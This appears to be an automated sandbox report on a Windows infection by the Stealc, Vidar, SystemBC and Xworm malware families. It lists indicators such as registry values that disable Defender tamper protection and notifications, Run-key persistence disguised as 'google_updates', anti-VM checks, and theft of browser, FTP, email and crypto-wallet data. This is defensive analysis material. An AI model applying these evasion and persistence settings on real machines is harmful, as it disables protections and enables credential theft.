| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
Stealc
Stealc family
SystemBC
Systembc family
Vidar
Vidar family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dll32.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\Oar936gK\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c29c440560.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107370101\\c29c440560.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9bd1404279.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107380101\\9bd1404279.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4b886460ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107390101\\4b886460ab.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8809d7d07b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107400101\\8809d7d07b.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4596 set thread context of 452 | N/A | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe |
| PID 4496 set thread context of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856873749173507" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
